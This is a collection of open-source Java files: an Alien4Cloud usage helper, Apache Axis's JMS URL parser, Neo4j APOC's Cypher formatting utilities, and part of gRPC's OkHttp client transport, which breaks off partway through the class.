csar.getId(), csar.getWorkspace()); resourceList.add(temp); } return resourceList; } /** * Generate resources related to a locations list * * @param locations * @return */ public List<Usage> generateLocationsInfo(Location[] locations) { String resourceName; String resourceId; List<Usage> resourceList = Lists.newArrayList(); for (Location location : locations) { resourceName = location.getName(); resourceId = location.getId(); Usage temp = new Usage(resourceName, Location.class.getSimpleName().toLowerCase(), resourceId, AlienConstants.GLOBAL_WORKSPACE_ID); resourceList.add(temp); } return resourceList; } /** * Generate resources (application or template) related to a topology list * * @param topologies * @return */ public List<Usage> generateTopologiesInfo(Topology[] topologies) { List<Usage> resourceList = Lists.newArrayList(); List<Csar> topologiesCsar = getTopologiesCsar(topologies); for (Csar csar : topologiesCsar) { if (Objects.equals(csar.getDelegateType(), ArchiveDelegateType.APPLICATION.toString())) { // get the related application Application application = applicationService.checkAndGetApplication(csar.getDelegateId()); resourceList.add(new Usage(application.getName(), csar.getDelegateType(), csar.getDelegateId(), csar.getWorkspace())); } else { resourceList.add(new Usage(csar.getName() + "[" + csar.getVersion() + "]", "topologyTemplate", csar.getId(), csar.getWorkspace())); } } return resourceList; } }
/* * Copyright 2001, 2002,2004 The Apache Software Foundation. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.axis.transport.jms; import java.net.URL; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.StringTokenizer; import java.util.Vector; /** * JMSURLHelper provides access to properties in the URL. * The URL must be of the form: "jms:/&lt;destination&gt;?[&lt;property&gt;=&lt;key&gt;&amp;]*" * * @author Ray Chun (rchun@sonicsoftware.com) */ public class JMSURLHelper { private URL url; // the only property not in the query string private String destination; // vendor-specific properties private HashMap properties; // required properties private Vector requiredProperties; //application-specific JMS message properties private Vector appProperties; public JMSURLHelper(java.net.URL url) throws java.net.MalformedURLException { this(url, null); } public JMSURLHelper(java.net.URL url, String[] requiredProperties) throws java.net.MalformedURLException { this.url = url; properties = new HashMap(); appProperties = new Vector(); // the path should be something like '/SampleQ1' // clip the leading '/' if there is one destination = url.getPath(); if (destination.startsWith("/")) destination = destination.substring(1); if ((destination == null) || (destination.trim().length() < 1)) throw new java.net.MalformedURLException("Missing destination in URL"); // parse the query string and populate the properties table String query = url.getQuery(); StringTokenizer st = new StringTokenizer(query, "&;"); while (st.hasMoreTokens()) { String keyValue = st.nextToken(); int eqIndex = keyValue.indexOf("="); if (eqIndex > 0) { String key = keyValue.substring(0, eqIndex); String value = keyValue.substring(eqIndex+1); if (key.startsWith(JMSConstants._MSG_PROP_PREFIX)) { key = key.substring( JMSConstants._MSG_PROP_PREFIX.length()); addApplicationProperty(key); } properties.put(key, value); } } // set required properties addRequiredProperties(requiredProperties); validateURL(); } public String getDestination() { return destination; } public void setDestination(String destination) { this.destination = destination; } public String getVendor() { return getPropertyValue(JMSConstants._VENDOR); } public String getDomain() { return getPropertyValue(JMSConstants._DOMAIN); } public HashMap getProperties() { return properties; } public String getPropertyValue(String property) { return (String)properties.get(property); } public void addRequiredProperties(String[] properties) { if (properties == null) return; for (int i = 0; i < properties.length; i++) { addRequiredProperty(properties[i]); } } public void addRequiredProperty(String property) { if (property == null) return; if (requiredProperties == null) requiredProperties = new Vector(); requiredProperties.addElement(property); } public Vector getRequiredProperties() { return requiredProperties; } /** Adds the name of a property from the url properties that should * be added to the JMS message. */ public void addApplicationProperty(String property) { if (property == null) return; if (appProperties == null) appProperties = new Vector(); appProperties.addElement(property); } /** Adds the name and value od the application property to the * JMS URL. */ public void addApplicationProperty(String property, String value) { if (property == null) return; if (appProperties == null) appProperties = new Vector(); properties.put(property, value); appProperties.addElement(property); } /** Returns a collection of properties that are defined within the * JMS URL to be added directly to the JMS messages. @return collection or null depending on presence of elements */ public Vector getApplicationProperties() { return appProperties; } /** Returns a URL formatted String. The properties of the URL may not end up in the same order as the JMS URL that was originally used to create this object. */ public String getURLString() { StringBuffer text = new StringBuffer("jms:/"); text.append(getDestination()); text.append("?"); Map props = (Map)properties.clone(); boolean firstEntry = true; for(Iterator itr=properties.keySet().iterator(); itr.hasNext();) { String key = (String)itr.next(); if (!firstEntry) { text.append("&"); } if (appProperties.contains(key)) { text.append(JMSConstants._MSG_PROP_PREFIX); } text.append(key); text.append("="); text.append(props.get(key)); firstEntry = false; } return text.toString(); } /** Returns a formatted URL String with the assigned properties */ public String toString() { return getURLString(); } private void validateURL() throws java.net.MalformedURLException { Vector required = getRequiredProperties(); if (required == null) return; for (int i = 0; i < required.size(); i++) { String key = (String)required.elementAt(i); if (properties.get(key) == null) throw new java.net.MalformedURLException(); } } }
package apoc.export.cypher.formatter; import apoc.export.util.FormatUtils; import apoc.util.Util; import org.neo4j.graphdb.Label; import org.neo4j.graphdb.Node; import org.neo4j.graphdb.Relationship; import org.neo4j.internal.helpers.collection.Iterables; import org.neo4j.values.storable.DurationValue; import org.neo4j.values.storable.Value; import org.neo4j.values.storable.Values; import java.lang.reflect.Array; import java.time.temporal.Temporal; import java.util.*; import java.util.stream.Collectors; import static apoc.export.util.FormatUtils.getLabelsSorted; /** * @author AgileLARUS * * @since 16-06-2017 */ public class CypherFormatterUtils { public final static String UNIQUE_ID_LABEL = "UNIQUE IMPORT LABEL"; public final static String UNIQUE_ID_PROP = "UNIQUE IMPORT ID"; public final static String Q_UNIQUE_ID_LABEL = quote(UNIQUE_ID_LABEL); public final static String FUNCTION_TEMPLATE = "%s('%s')"; // ---- node id ---- public static String formatNodeLookup(String id, Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames) { StringBuilder result = new StringBuilder(100); result.append("("); result.append(id); result.append(getNodeIdLabels(node, uniqueConstraints, indexNames)); Map<String, Object> nodeIdProperties = getNodeIdProperties(node, uniqueConstraints); if (nodeIdProperties.size() > 0) { result.append("{"); StringBuilder props = new StringBuilder(100); for (String prop : nodeIdProperties.keySet()) { props.append(", "); props.append(quote(prop)); props.append(":"); props.append(CypherFormatterUtils.toString(nodeIdProperties.get(prop))); } result.append(props.substring(2)); result.append("}"); } result.append(")"); return result.toString(); } public static Map<String, Object> getNodeIdProperties(Node node, Map<String, Set<String>> uniqueConstraints) { Map<String, Object> nodeIdProperties = new LinkedHashMap<>(); List<String> list = getLabelsSorted(node); for (String labelName : list) { if (!isUniqueLabelFound(node, uniqueConstraints, labelName)) { continue; } uniqueConstraints.get(labelName).forEach(prop -> { nodeIdProperties.put(prop, node.getProperty(prop)); }); } if (nodeIdProperties.isEmpty()) { nodeIdProperties.put(UNIQUE_ID_PROP, node.getId()); } return nodeIdProperties; } // ---- labels ---- public static String formatAllLabels(Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames) { StringBuilder result = new StringBuilder(100); boolean uniqueLabelFound = false; List<String> list = getLabelsSorted(node); for (String labelName : list) { if (!uniqueLabelFound) { uniqueLabelFound = isUniqueLabelFound(node, uniqueConstraints, labelName); } if (indexNames != null && indexNames.contains(labelName)) result.insert(0, label(labelName)); else result.append(label(labelName)); } if (!uniqueLabelFound) { result.append(label(UNIQUE_ID_LABEL)); } return result.toString(); } public static String formatNotUniqueLabels(String id, Node node, Map<String, Set<String>> uniqueConstraints) { StringBuilder result = new StringBuilder(100); List<String> list = getLabelsSorted(node); for (String labelName : list) { if (!isUniqueLabelFound(node, uniqueConstraints, labelName)) { result.append(", "); result.append(id); result.append(label(labelName)); } } return formatToString(result); } private static String getNodeIdLabels(Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames) { StringBuilder result = new StringBuilder(100); List<String> list = getLabelsSorted(node).stream() .filter(labelName -> isUniqueLabelFound(node, uniqueConstraints, labelName)) .collect(Collectors.toList()); if (list.isEmpty()) { result.append(label(UNIQUE_ID_LABEL)); } else { list.forEach(labelName -> { if (indexNames != null && indexNames.contains(labelName)) { result.insert(0, label(labelName)); } else { result.append(label(labelName)); } }); } return result.toString(); } public static boolean isUniqueLabelFound(Node node, Map<String, Set<String>> uniqueConstraints, String labelName) { if (uniqueConstraints.containsKey(labelName)) { Set<String> nodeUniqueConstraint = uniqueConstraints.get(labelName); return nodeUniqueConstraint.stream().allMatch(node::hasProperty); } else { return false; } } // ---- properties ---- public static String formatNodeProperties(String id, Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexNames, boolean jsonStyle) { StringBuilder result = formatProperties(id, node.getAllProperties(), jsonStyle); if (getNodeIdLabels(node, uniqueConstraints, indexNames).endsWith(label(UNIQUE_ID_LABEL))) { result.append(", "); result.append(formatPropertyName(id, UNIQUE_ID_PROP, node.getId(), jsonStyle)); } return formatToString(result); } public static String formatRelationshipProperties(String id, Relationship relationship, boolean jsonStyle) { StringBuilder result = formatProperties(id, relationship.getAllProperties(), jsonStyle); return formatToString(result); } public static String formatNotUniqueProperties(String id, Node node, Map<String, Set<String>> uniqueConstraints, Set<String> indexedProperties, boolean jsonStyle) { Map<String, Object> properties = new LinkedHashMap<>(); List<String> keys = Iterables.asList(node.getPropertyKeys()); Collections.sort(keys); Map<String, Object> nodeIdProperties = getNodeIdProperties(node, uniqueConstraints); for (String prop : keys) { if (!nodeIdProperties.containsKey(prop) && indexedProperties.contains(prop)) properties.put(prop, node.getProperty(prop)); } for (String prop : keys) { if (!nodeIdProperties.containsKey(prop) && !indexedProperties.contains(prop)) properties.put(prop, node.getProperty(prop)); } StringBuilder result = new StringBuilder(100); for (String key : properties.keySet()) { result.append(", "); result.append(formatPropertyName(id, key, properties.get(key), jsonStyle)); } return formatToString(result); } public static String formatToString(StringBuilder result) { return result.length() > 0 ? result.substring(2) : ""; } public static StringBuilder formatProperties(Map<String, Object> properties) { return formatProperties("", properties, true); } public static StringBuilder formatProperties(String id, Map<String, Object> properties, boolean jsonStyle) { StringBuilder result = new StringBuilder(100); if (properties != null) { List<String> keys = Iterables.asList(properties.keySet()); Collections.sort(keys); for (String prop : keys) { result.append(", "); result.append(formatPropertyName(id, prop, properties.get(prop), jsonStyle)); } } return result; } public static String formatPropertyName(String id, String prop, Object value, boolean jsonStyle) { return (id != null && !"".equals(id) ? id + "." : "") + quote(prop) + (jsonStyle ? ":" : "=" ) + toString(value); } // ---- to string ---- public static String quote(Iterable<String> ids) { StringBuilder builder = new StringBuilder(); for (Iterator<String> iterator = ids.iterator(); iterator.hasNext(); ) { String id = iterator.next(); builder.append(quote(id)); if (iterator.hasNext()) { builder.append(","); } } return builder.toString(); } @Deprecated /** * use {@link Util#quote()} */ public static String quote(String id) { return Util.quote(id); } public static String label(String id) { return ":" + quote(id); } public static String toString(Object value) { if (value == null) return "null"; if (value instanceof String) return FormatUtils.formatString(value); if (value instanceof Number) { return FormatUtils.formatNumber((Number) value); } if (value instanceof Boolean) return value.toString(); if (value instanceof Iterator) { return toString(((Iterator) value)); } if (value instanceof Iterable) { return toString(((Iterable) value).iterator()); } if (value.getClass().isArray()) { return arrayToString(value); } if (value instanceof Temporal){ Value val = Values.of(value); return toStringFunction(val); } if (value instanceof DurationValue) { return toStringFunction((DurationValue) value); } return value.toString(); } private static String toStringFunction(Value value) { return String.format(FUNCTION_TEMPLATE, value.getTypeName().toLowerCase(), value.toString()); } public static String toString(Iterator<?> iterator) { StringBuilder result = new StringBuilder(); while (iterator.hasNext()) { if (result.length() > 0) result.append(", "); Object value = iterator.next(); result.append(toString(value)); } return "[" + result + "]"; } public static String arrayToString(Object value) { int length = Array.getLength(value); StringBuilder result = new StringBuilder(10 * length); for (int i = 0; i < length; i++) { if (i > 0) result.append(", "); result.append(toString(Array.get(value, i))); } return "[" + result.toString() + "]"; } public static String cypherNode(Label label) { return String.format("(%s)", label == null ? "" : ":" + Util.quote(label.name())); } }
/* * Copyright 2014, Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * * Neither the name of Google Inc. nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package io.grpc.okhttp; import static com.google.common.base.Preconditions.checkState; import static io.grpc.internal.GrpcUtil.TIMER_SERVICE; import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Preconditions; import com.google.common.base.Stopwatch; import com.google.common.base.Ticker; import com.google.common.util.concurrent.SettableFuture; import io.grpc.Attributes; import io.grpc.CallOptions; import io.grpc.Metadata; import io.grpc.MethodDescriptor; import io.grpc.MethodDescriptor.MethodType; import io.grpc.Status; import io.grpc.Status.Code; import io.grpc.internal.ConnectionClientTransport; import io.grpc.internal.GrpcUtil; import io.grpc.internal.Http2Ping; import io.grpc.internal.KeepAliveManager; import io.grpc.internal.SerializingExecutor; import io.grpc.internal.SharedResourceHolder; import io.grpc.okhttp.internal.ConnectionSpec; import io.grpc.okhttp.internal.framed.ErrorCode; import io.grpc.okhttp.internal.framed.FrameReader; import io.grpc.okhttp.internal.framed.FrameWriter; import io.grpc.okhttp.internal.framed.Header; import io.grpc.okhttp.internal.framed.HeadersMode; import io.grpc.okhttp.internal.framed.Http2; import io.grpc.okhttp.internal.framed.Settings; import io.grpc.okhttp.internal.framed.Variant; import okio.Buffer; import okio.BufferedSink; import okio.BufferedSource; import okio.ByteString; import okio.Okio; import okio.Source; import okio.Timeout; import java.io.IOException; import java.net.InetSocketAddress; import java.net.Socket; import java.net.URI; import java.util.Collections; import java.util.EnumMap; import java.util.HashMap; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.Random; import java.util.concurrent.Executor; import java.util.concurrent.ScheduledExecutorService; import java.util.logging.Level; import java.util.logging.Logger; import javax.annotation.Nullable; import javax.annotation.concurrent.GuardedBy; import javax.net.ssl.SSLSocketFactory; /** * A okhttp-based {@link ConnectionClientTransport} implementation. */ class OkHttpClientTransport implements ConnectionClientTransport { private static final Map<ErrorCode, Status> ERROR_CODE_TO_STATUS = buildErrorCodeToStatusMap(); private static final Logger log = Logger.getLogger(OkHttpClientTransport.class.getName()); private static final OkHttpClientStream[] EMPTY_STREAM_ARRAY = new OkHttpClientStream[0]; private static Map<ErrorCode, Status> buildErrorCodeToStatusMap() { Map<ErrorCode, Status> errorToStatus = new EnumMap<ErrorCode, Status>(ErrorCode.class); errorToStatus.put(ErrorCode.NO_ERROR, Status.INTERNAL.withDescription("No error: A GRPC status of OK should have been sent")); errorToStatus.put(ErrorCode.PROTOCOL_ERROR, Status.INTERNAL.withDescription("Protocol error")); errorToStatus.put(ErrorCode.INTERNAL_ERROR, Status.INTERNAL.withDescription("Internal error")); errorToStatus.put(ErrorCode.FLOW_CONTROL_ERROR, Status.INTERNAL.withDescription("Flow control error")); errorToStatus.put(ErrorCode.STREAM_CLOSED, Status.INTERNAL.withDescription("Stream closed")); errorToStatus.put(ErrorCode.FRAME_TOO_LARGE, Status.INTERNAL.withDescription("Frame too large")); errorToStatus.put(ErrorCode.REFUSED_STREAM, Status.UNAVAILABLE.withDescription("Refused stream")); errorToStatus.put(ErrorCode.CANCEL, Status.CANCELLED.withDescription("Cancelled")); errorToStatus.put(ErrorCode.COMPRESSION_ERROR, Status.INTERNAL.withDescription("Compression error")); errorToStatus.put(ErrorCode.CONNECT_ERROR, Status.INTERNAL.withDescription("Connect error")); errorToStatus.put(ErrorCode.ENHANCE_YOUR_CALM, Status.RESOURCE_EXHAUSTED.withDescription("Enhance your calm")); errorToStatus.put(ErrorCode.INADEQUATE_SECURITY, Status.PERMISSION_DENIED.withDescription("Inadequate security")); return Collections.unmodifiableMap(errorToStatus); } private final InetSocketAddress address; private final String defaultAuthority; private final String userAgent; private final Random random = new Random(); private final Ticker ticker; private Listener listener; private FrameReader testFrameReader; private AsyncFrameWriter frameWriter; private OutboundFlowController outboundFlow; private final Object lock = new Object(); @GuardedBy("lock") private int nextStreamId; @GuardedBy("lock") private final Map<Integer, OkHttpClientStream> streams = new HashMap<Integer, OkHttpClientStream>(); private final Executor executor; // Wrap on executor, to guarantee some operations be executed serially. private final SerializingExecutor serializingExecutor; private final int maxMessageSize; private int connectionUnacknowledgedBytesRead; private ClientFrameHandler clientFrameHandler; /** * Indicates the transport is in go-away state: no new streams will be processed, but existing * streams may continue. */ @GuardedBy("lock") private Status goAwayStatus; @GuardedBy("lock") private boolean goAwaySent; @GuardedBy("lock") private Http2Ping ping; @GuardedBy("lock") private boolean stopped; @GuardedBy("lock") private boolean inUse; private SSLSocketFactory sslSocketFactory; private Socket socket; @GuardedBy("lock") private int maxConcurrentStreams = 0; @GuardedBy("lock") private LinkedList<OkHttpClientStream> pendingStreams = new LinkedList<OkHttpClientStream>(); private final ConnectionSpec connectionSpec; private FrameWriter testFrameWriter; private ScheduledExecutorService scheduler; private KeepAliveManager keepAliveManager; private boolean enableKeepAlive; private long keepAliveDelayNanos; private long keepAliveTimeoutNanos; // The following fields should only be used for test. Runnable connectingCallback; SettableFuture<Void> connectedFuture; OkHttpClientTransport(InetSocketAddress address, String authority, @Nullable String userAgent, Executor executor, @Nullable SSLSocketFactory sslSocketFactory, ConnectionSpec connectionSpec, int maxMessageSize) { this.address = Preconditions.checkNotNull(address, "address"); this.defaultAuthority = authority; this.maxMessageSize = maxMessageSize; this.executor = Preconditions.checkNotNull(executor, "executor"); serializingExecutor = new SerializingExecutor(executor); // Client initiated streams are odd, server initiated ones are even. Server should not need to // use it. We start clients at 3 to avoid conflicting with HTTP negotiation. nextStreamId = 3; this.sslSocketFactory = sslSocketFactory; this.connectionSpec = Preconditions.checkNotNull(connectionSpec, "connectionSpec"); this.ticker = Ticker.systemTicker(); this.userAgent = GrpcUtil.getGrpcUserAgent("okhttp", userAgent); } /** * Create a transport connected to a fake peer for test. */ @VisibleForTesting OkHttpClientTransport(String userAgent, Executor executor, FrameReader frameReader, FrameWriter testFrameWriter, int nextStreamId, Socket socket, Ticker ticker, @Nullable Runnable connectingCallback, SettableFuture<Void> connectedFuture, int maxMessageSize) { address = null; this.maxMessageSize = maxMessageSize; defaultAuthority = "notarealauthority:80"; this.userAgent = GrpcUtil.getGrpcUserAgent("okhttp", userAgent); this.executor = Preconditions.checkNotNull(executor); serializingExecutor = new SerializingExecutor(executor); this.testFrameReader = Preconditions.checkNotNull(frameReader); this.testFrameWriter = Preconditions.checkNotNull(testFrameWriter); this.socket = Preconditions.checkNotNull(socket); this.nextStreamId = nextStreamId; this.ticker = ticker; this.connectionSpec = null; this.connectingCallback = connectingCallback; this.connectedFuture = Preconditions.checkNotNull(connectedFuture); } /** * Enable keepalive with custom delay and timeout. */ void enableKeepAlive(boolean enable, long keepAliveDelayNanos, long keepAliveTimeoutNanos) { enableKeepAlive = enable; this.keepAliveDelayNanos = keepAliveDelayNanos; this.keepAliveTimeoutNanos = keepAliveTimeoutNanos; } private boolean isForTest() { return address == null; } @Override public void ping(final PingCallback callback, Executor executor) { checkState(frameWriter != null); long data = 0; Http2Ping p; boolean writePing; synchronized (lock) { if (stopped) { Http2Ping.notifyFailed(callback, executor, getPingFailure()); return; } if (ping != null) { // we only allow one outstanding ping at a time, so just add the callback to // any outstanding operation p = ping; writePing = false; } else { // set outstanding operation and then write the ping after releasing lock data = random.nextLong(); p = ping = new Http2Ping(data, Stopwatch.createStarted(ticker)); writePing = true; } } if (writePing) { frameWriter.ping(false, (int) (data >>> 32), (int) data); } // If transport concurrently failed/stopped since we released the lock above, this could // immediately invoke callback (which we shouldn't do while holding a lock) p.addCallback(callback, executor); } @Override public OkHttpClientStream newStream(final MethodDescriptor<?, ?> method, final Metadata headers, CallOptions callOptions) { Preconditions.checkNotNull(method, "method"); Preconditions.checkNotNull(headers, "headers"); return new OkHttpClientStream(method, headers, frameWriter, OkHttpClientTransport.this, outboundFlow, lock, maxMessageSize, defaultAuthority, userAgent); } @Override public OkHttpClientStream newStream(final MethodDescriptor<?, ?> method, final Metadata headers) { return newStream(method, headers, CallOptions.DEFAULT); } @GuardedBy("lock") void streamReadyToStart(OkHttpClientStream clientStream) { synchronized (lock) { if (goAwayStatus != null) { clientStream.transportReportStatus(goAwayStatus, true, new Metadata()); } else if (streams.size() >= maxConcurrentStreams) { pendingStreams.add(clientStream); setInUse(); } else { startStream(clientStream); } } } @GuardedBy("lock") private void startStream(OkHttpClientStream stream) { Preconditions.checkState(stream.id() == null, "StreamId already assigned"); streams.put(nextStreamId, stream); setInUse(); stream.start(nextStreamId); stream.allocated(); // For unary and server streaming, there will be a data frame soon, no need to flush the header. if (stream.getType() != MethodType.UNARY && stream.getType() != MethodType.SERVER_STREAMING) { frameWriter.flush(); } if (nextStreamId >= Integer.MAX_VALUE - 2) { // Make sure nextStreamId greater than all used id, so that mayHaveCreatedStream() performs // correctly. nextStreamId = Integer.MAX_VALUE; startGoAway(Integer.MAX_VALUE, ErrorCode.NO_ERROR, Status.UNAVAILABLE.withDescription("Stream ids exhausted")); } else { nextStreamId += 2; } } /** * Starts pending streams, returns true if at least one pending stream is started. */ @GuardedBy("lock") private boolean startPendingStreams() { boolean hasStreamStarted = false; while (!pendingStreams.isEmpty() && streams.size() < maxConcurrentStreams) { OkHttpClientStream stream = pendingStreams.poll(); startStream(stream); hasStreamStarted = true; } return hasStreamStarted; } /** * Removes given pending stream, used when a pending stream is cancelled. */ @GuardedBy("lock") void removePendingStream(OkHttpClientStream pendingStream) { pendingStreams.remove(pendingStream); maybeClearInUse(); } @Override public void start(Listener listener) { this.listener = Preconditions.checkNotNull(listener, "listener"); if (enableKeepAlive) { scheduler = SharedResourceHolder.get(TIMER_SERVICE); keepAliveManager = new KeepAliveManager(this, scheduler, keepAliveDelayNanos, keepAliveTimeoutNanos); } frameWriter = new AsyncFrameWriter(this, serializingExecutor); outboundFlow = new OutboundFlowController(this, frameWriter); // Connecting in the serializingExecutor, so that some stream operations like synStream // will be executed after connected. serializingExecutor.execute(new Runnable() { @Override public void run() { if (isForTest()) { if (connectingCallback != null) { connectingCallback.run(); } clientFrameHandler = new ClientFrameHandler(testFrameReader); executor.execute(clientFrameHandler); synchronized (lock) { maxConcurrentStreams = Integer.MAX_VALUE; startPendingStreams(); } frameWriter.becomeConnected(testFrameWriter, socket); connectedFuture.set(null); return; } // Use closed source on failure so that the reader immediately shuts down. BufferedSource source = Okio.buffer(new Source() { @Override public long read(Buffer sink, long byteCount) { return -1; } @Override public Timeout timeout() { return Timeout.NONE; } @Override public void close() {} }); Variant variant = new Http2(); BufferedSink sink; Socket sock; try { sock = new Socket(address.getAddress(), address.getPort()); if (sslSocketFactory != null) { sock = OkHttpTlsUpgrader.upgrade( sslSocketFactory, sock, getOverridenHost(), getOverridenPort(), connectionSpec); } sock.setTcpNoDelay(true); source = Okio.buffer(Okio.source(sock)); sink = Okio.buffer(Okio.sink(sock)); } catch (Exception e) { onException(e); return; } finally { clientFrameHandler = new ClientFrameHandler(variant.newReader(source, true)); executor.execute(clientFrameHandler); } FrameWriter rawFrameWriter; synchronized (lock) { socket = sock; maxConcurrentStreams = Integer.MAX_VALUE; startPendingStreams(); } rawFrameWriter = variant.newWriter(sink, true); frameWriter.becomeConnected(rawFrameWriter, socket); try { // Do these with the raw FrameWriter, so that they will be done in this thread, // and before any possible pending stream operations. rawFrameWriter.connectionPreface(); Settings settings = new Settings(); rawFrameWriter.settings(settings); } catch (Exception e) { onException(e); return; } } }); } @Override public String toString() { return getLogId() + "(" + address + ")"; } @Override public String getLogId() { return GrpcUtil.getLogId(this); } /** * Gets the overriden authority hostname. If the authority is overriden to be an invalid * authority, uri.getHost() will (rightly) return null, since the authority is no longer * an actual service. This method overrides the behavior for practical reasons. For example, * if an authority is in the form "invalid_authority" (note the "_"), rather than return null, * we return the input. This is because the return value, in conjunction with getOverridenPort, * are used by the SSL library to reconstruct the actual authority. It /already/ has a * connection to the port, independent of this function. * * <p>Note: if the defaultAuthority has a port number in it and is also bad, this code will do * the wrong thing. An example wrong behavior would be "invalid_host:443". Registry based * authorities do not have ports, so this is even more wrong than before. Sorry. */ @VisibleForTesting String getOverridenHost() { URI uri = GrpcUtil.authorityToUri(defaultAuthority); if (uri.getHost() != null) { return uri.getHost(); } return defaultAuthority; } @VisibleForTesting int getOverridenPort() { URI uri = GrpcUtil.authorityToUri(defaultAuthority); if (uri.getPort() != -1) { return uri.getPort(); } return address.getPort(); } @Override public void shutdown() { synchronized (lock) { if (goAwayStatus != null) { return; } goAwayStatus = Status.UNAVAILABLE.withDescription("Transport stopped"); listener.transportShutdown(goAwayStatus); stopIfNecessary(); if (keepAliveManager != null) { keepAliveManager.onTransportShutdown(); // KeepAliveManager should stop using the scheduler after onTransportShutdown gets called. scheduler = SharedResourceHolder.release(TIMER_SERVICE, scheduler); } } } @Override public void shutdownNow(Status reason) { shutdown(); synchronized (lock) { Iterator<Map.Entry<Integer, OkHttpClientStream>> it = streams.entrySet().iterator(); while (it.hasNext()) { Map.Entry<Integer, OkHttpClientStream> entry = it.next(); it.remove(); entry.getValue().transportReportStatus(reason, false, new Metadata()); } for (OkHttpClientStream stream : pendingStreams) { stream.transportReportStatus(reason, true, new Metadata()); } pendingStreams.clear(); maybeClearInUse(); stopIfNecessary(); } } @Override public Attributes getAttrs() { // TODO(zhangkun83): fill channel security attributes return Attributes.EMPTY; } /** * Gets all active streams as an array. */ OkHttpClientStream[] getActiveStreams() { synchronized (lock) { return streams.values().toArray(EMPTY_STREAM_ARRAY); } } @VisibleForTesting ClientFrameHandler getHandler() { return clientFrameHandler; } @VisibleForTesting int getPendingStreamSize() { synchronized (lock) { return pendingStreams.size(); } } /** * Finish all active streams due to an IOException, then close the transport. */ void onException(Throwable failureCause) { Preconditions.checkNotNull(failureCause, "failureCause"); Status status = Status.UNAVAILABLE.withCause(failureCause); startGoAway(0, ErrorCode.INTERNAL_ERROR, status); } /** * Send GOAWAY to the server, then finish all active streams and close the transport. */ private void onError(ErrorCode errorCode, String moreDetail) { startGoAway(0, errorCode, toGrpcStatus(errorCode).augmentDescription(moreDetail)); } private void startGoAway(int lastKnownStreamId, ErrorCode errorCode, Status status) { synchronized (lock) { if (goAwayStatus == null) { goAwayStatus = status; listener.transportShutdown(status); } if (errorCode != null && !goAwaySent) { // Send GOAWAY with lastGoodStreamId of 0, since we don't expect any server-initiated // streams. The GOAWAY is part of graceful shutdown. goAwaySent = true; frameWriter.goAway(0, errorCode, new byte[0]); } Iterator<Map.Entry<Integer, OkHttpClientStream>> it = streams.entrySet().iterator(); while (it.hasNext()) { Map.Entry<Integer, OkHttpClientStream> entry = it.next(); if (entry.getKey() > lastKnownStreamId) { it.remove(); entry.getValue().transportReportStatus(status, false, new Metadata()); } } for (OkHttpClientStream stream : pendingStreams) { stream.transportReportStatus(status, true, new Metadata()); } pendingStreams.clear(); maybeClearInUse(); stopIfNecessary(); } } /** * Called when a stream is closed, we do things like: * <ul> * <li>Removing the stream from the map. * <li>Optionally reporting the status. * <li>Starting pending streams if we can. * <li>Stopping the transport if this is the last live stream under a go-away status. * </ul> * * @param streamId the Id of the stream. * @param status the final status of this stream, null means no need to report. * @param errorCode reset the stream with this ErrorCode if not null. */ void finishStream(int streamId, @Nullable Status status, @Nullable ErrorCode errorCode) { synchronized (lock) { OkHttpClientStream stream = streams.remove(streamId); if (stream != null) { if (errorCode != null) { frameWriter.rstStream(streamId, ErrorCode.CANCEL); } if (status != null) { boolean isCancelled = (status.getCode() == Code.CANCELLED || status.getCode() == Code.DEADLINE_EXCEEDED); stream.transportReportStatus(status, isCancelled, new Metadata()); } if (!startPendingStreams()) { stopIfNecessary(); maybeClearInUse(); } } } } /** * When the transport is in goAway state, we should stop it once all active streams finish. */ @GuardedBy("lock") void stopIfNecessary() { if (!(goAwayStatus != null && streams.isEmpty() && pendingStreams.isEmpty())) { return; } if (stopped) { return; } stopped = true; if (ping != null) { ping.failed(getPingFailure()); ping = null; } if (!goAwaySent) { // Send GOAWAY with lastGoodStreamId of 0, since we don't expect any server-initiated // streams. The GOAWAY is part of graceful shutdown. goAwaySent = true; frameWriter.goAway(0, ErrorCode.NO_ERROR, new byte[0]); } // We will close the underlying socket in the writing thread to break out the reader // thread, which will close the frameReader and notify the listener. frameWriter.close(); } @GuardedBy("lock") private void maybeClearInUse() { if (inUse) { if (pendingStreams.isEmpty() && streams.isEmpty()) { inUse = false; listener.transportInUse(false); if (keepAliveManager != null) { // We don't have any active streams. No need to do keepalives any more. // Again, we have to call this inside the lock to avoid the race between onTransportIdle // and onTransportActive. keepAliveManager.onTransportIdle(); } } } } 